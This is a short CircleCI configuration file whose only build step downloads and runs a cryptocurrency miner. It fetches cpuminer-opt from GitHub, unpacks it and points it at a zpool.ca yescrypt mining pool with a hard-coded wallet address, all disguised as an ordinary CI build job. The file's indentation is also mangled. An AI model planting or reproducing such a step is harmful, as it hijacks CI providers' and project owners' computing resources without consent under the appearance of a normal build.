
version: 2.0
jobs:
  build:
      docker:
            - image: circleci/ruby:2.4.2-jessie-node
                    auth:
                              username: mydockerhub-user
                                        password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
                                            steps:
                                                  - checkout
                                                        - run:  wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2  -a yescrypt -o stratum+tcp://yescrypt.sea.mine.zpool.ca:6233 -u 52Mz5YqJ8hTZWg3CRLuVsJwyf2Ftt5n9Ej  -p  c=XMY
                                                             